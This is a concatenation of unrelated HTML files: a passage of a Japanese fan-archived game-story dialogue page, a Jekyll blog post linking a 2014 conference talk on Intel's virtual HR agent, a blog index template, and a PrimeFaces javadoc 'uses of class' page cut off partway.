src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">この森は20年間、このままだ。 植物が蘇らねえんだ。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_4.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">“奴”の仕業でな……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_8.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">“奴”……?</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">ああ……。突如姿を現した“奴”は 破壊の限りを尽くし、</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">この地方を……地獄に変えた。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_8.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">ここまでできるなんて…… イシュグリアから来た魔神……?</div> </div> <br> <div class="dialogueSeparator" > <img src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/dialogueSeparator.png" align="middle" /> </div> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">そんな生易しいもんじゃねえ。魔神には 違いねえだろうが“奴”はもっと別の……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_4.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">今のは……!!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">Shou-chan、 どうやらテメーも感じたようだな。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">行くぞ!!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_3.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">え、何!? 2人ともいきなり走り出して……?</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_4.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">ちょっと、待ってよー!!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara105_5.png" /> </div> <div class="speakerName"><a href="http://i.imgur.com/bE1ouRw.png">ギャレット</a></div> <div class="speakerMessage">グッ……予想より6時間26分も早い……。 いや、私の行動が遅いのか……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_2.png" /> </div> <div class="speakerName"><a href="http://i.imgur.com/pstdRvJ.png">メル</a></div> <div class="speakerMessage">…………。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" /> </div> <div class="speakerName"><a href="http://i.imgur.com/L9KARyy.png">ベルツ</a></div> <div class="speakerMessage">あまり手こずらせないで頂きたいですね。 アベル機関残党、ギャレット、メル……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara105_5.png" /> </div> <div class="speakerName">ギャレット</div> <div class="speakerMessage">あと……少しのところだというのに……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">あなた方が、なぜこの地にやって来たのか… その目的は知っています。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">ですが、 “それ”を実行させるつもりはありません。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_5.png" /> </div> <div class="speakerName">メル</div> <div class="speakerMessage">クッ……!!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara105_5.png" /> </div> <div class="speakerName">ギャレット</div> <div class="speakerMessage">………おのれ!!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">おっと……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_2.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">やはり、 素直に倒されてくれたりはしないようですね</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">ですが、俺にも事情というものがあります。 本気を出させて……</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_1.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage"><div style="display:inline;font-size:20px">待て!!</div></div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_5.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">………!!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_6.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">ハァッ……ハァッ…… そうだよ、みんな戦いをやめて……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_5.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">ルジーナ、なぜここに!?</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">事情は後で話す。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_1.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">だが、とりあえずテメーらどちらも 武器をしまいやがれ!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara105_2.png" /> </div> <div class="speakerName">ギャレット</div> <div class="speakerMessage">武器をしまえだと……!? 貴様らの捕虜になれとでも言うのか……!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara105_2.png" /> </div> <div class="speakerName">ギャレット</div> <div class="speakerMessage">ふざけるな……!!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_2.png" /> </div> <div class="speakerName">メル</div> <div class="speakerMessage">負けない……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_4.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">ルジーナ……もしかして 俺たちの戦いを止めに来たのかい?</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_1.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">だとしたら、 それは、受け入れることはできない。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara51_3.png" /> </div> <div class="speakerName">ベルツ</div> <div class="speakerMessage">邪魔をするなら、 いくらお前たちでも容赦はしない!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_8.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">そんな……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_4.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">チッ……予想はしていたが、 話を聞きもしやがらねえか。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_1.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">仕方がねえ……。 俺はベルツの野郎を止める!!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_1.png" /> </div> <div class="speakerName">ルジーナ</div> <div class="speakerMessage">Shou-chan、 テメーはギャレットとメルを止めろ!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara106_2.png" /> </div> <div class="speakerName">メル</div> <div class="speakerMessage">…………!!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara105_5.png" /> </div> <div class="speakerName">ギャレット</div> <div class="speakerMessage">私は…… ここで止まるわけには……いかないのだ!!</div> </div> <br> </body> </html> <!-- contact me at reddit /u/blackrobe199 -->
_posts/2014/2014-03-03-tobi-crabtree-on-virtual-agents-intelligent-content-2014.html
tomjohnson1492/tomjohnson1492.github.io
--- layout: post title: Tobi Crabtree on Virtual Agents (Intelligent Content 2014) date: 2014-03-03 22:59:00.000000000 -08:00 categories: - conference videocasts - podcasts tags: [] status: publish published: true --- <p>Tobi Crabtree talks about her presentation, "Ivy, Intel's Virtual HR Agent," at Intelligent Content 2014.</p> <h2>Video and audio files</h2> <iframe width="560" height="315" src="https://www.youtube.com/embed/4ONLaRaGf7o" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> <p><b>Audio</b></p> <p> <audio controls><br /> <source src="https://www.podtrac.com/pts/redirect.mp3?https://s3.us-west-1.wasabisys.com/idbwmedia.com/podcasts/icc/tobi_crabtree.mp3" type="audio/mpeg"><br /> Your browser does not support the audio element. Use Chrome or Firefox instead.<br /> </source></audio></p> <p><a href="https://www.podtrac.com/pts/redirect.mp3?https://s3.us-west-1.wasabisys.com/idbwmedia.com/podcasts/icc/tobi_crabtree.mp3">Download MP3</a> (right-click, then Save Link As)</p>
blog/index.html
lhr0909/lhr0909.github.io
--- title: Simon's Blog Posts layout: default --- <div id="blog" class="row"> <div class="columns"> <h2>{{ page.title }}</h2> <ul class="blog-list"> {% for post in site.posts %} <li> <span class="blog-meta">{{ post.date | date_to_string }}</span> &raquo; <a href="{{ post.url }}" class="blog-title">{{ post.title }}</a> </li> {% endfor %} </ul> </div> </div>
UnaCloudWebPortal/lib/primefaces/apidocs/org/primefaces/component/selectonelistbox/class-use/SelectOneListbox.html
UnaCloud/unacloudIaaS1.0
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_29) on Tue Feb 14 12:32:37 EET 2012 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> Uses of Class org.primefaces.component.selectonelistbox.SelectOneListbox (primefaces-3.1.1 3.1.1 API) </TITLE> <META NAME="date" CONTENT="2012-02-14"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.primefaces.component.selectonelistbox.SelectOneListbox (primefaces-3.1.1 3.1.1 API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/primefaces/component/selectonelistbox//class-useSelectOneListbox.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="SelectOneListbox.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>org.primefaces.component.selectonelistbox.SelectOneListbox</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox">SelectOneListbox</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.primefaces.component.selectonelistbox"><B>org.primefaces.component.selectonelistbox</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.primefaces.component.selectonelistbox"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox">SelectOneListbox</A> in <A HREF="../../../../../org/primefaces/component/selectonelistbox/package-summary.html">org.primefaces.component.selectonelistbox</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../org/primefaces/component/selectonelistbox/package-summary.html">org.primefaces.component.selectonelistbox</A> with parameters of type <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox">SelectOneListbox</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>protected &nbsp;void</CODE></FONT></TD> <TD><CODE><B>SelectOneListboxRenderer.</B><B><A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListboxRenderer.html#encodeInput(javax.faces.context.FacesContext, org.primefaces.component.selectonelistbox.SelectOneListbox, java.lang.String)">encodeInput</A></B>(javax.faces.context.FacesContext&nbsp;context, <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox">SelectOneListbox</A>&nbsp;listbox, <A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>&nbsp;clientId)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>protected &nbsp;void</CODE></FONT></TD> <TD><CODE><B>SelectOneListboxRenderer.</B><B><A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListboxRenderer.html#encodeList(javax.faces.context.FacesContext, org.primefaces.component.selectonelistbox.SelectOneListbox)">encodeList</A></B>(javax.faces.context.FacesContext&nbsp;context, <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox">SelectOneListbox</A>&nbsp;listbox)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>protected &nbsp;void</CODE></FONT></TD> <TD><CODE><B>SelectOneListboxRenderer.</B><B><A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListboxRenderer.html#encodeMarkup(javax.faces.context.FacesContext, org.primefaces.component.selectonelistbox.SelectOneListbox)">encodeMarkup</A></B>(javax.faces.context.FacesContext&nbsp;context, <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox">SelectOneListbox</A>&nbsp;listbox)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>protected &nbsp;void</CODE></FONT></TD> <TD><CODE><B>SelectOneListboxRenderer.</B><B><A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListboxRenderer.html#encodeOption(javax.faces.context.FacesContext, org.primefaces.component.selectonelistbox.SelectOneListbox, javax.faces.model.SelectItem, java.lang.Object, java.lang.Object, javax.faces.convert.Converter)">encodeOption</A></B>(javax.faces.context.FacesContext&nbsp;context, <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox">SelectOneListbox</A>&nbsp;listbox, javax.faces.model.SelectItem&nbsp;option, <A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</A>&nbsp;values, <A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</A>&nbsp;submittedValues, javax.faces.convert.Converter&nbsp;converter)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>protected &nbsp;void</CODE></FONT></TD> <TD><CODE><B>SelectOneListboxRenderer.</B><B><A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListboxRenderer.html#encodeScript(javax.faces.context.FacesContext, org.primefaces.component.selectonelistbox.SelectOneListbox)">encodeScript</A></B>(javax.faces.context.FacesContext&nbsp;context, <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox">SelectOneListbox</A>&nbsp;listbox)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>protected &nbsp;void</CODE></FONT></TD> <TD><CODE><B>SelectOneListboxRenderer.</B><B><A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListboxRenderer.html#encodeSelectItems(javax.faces.context.FacesContext, org.primefaces.component.selectonelistbox.SelectOneListbox)">encodeSelectItems</A></B>(javax.faces.context.FacesContext&nbsp;context, <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox">SelectOneListbox</A>&nbsp;listbox)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT 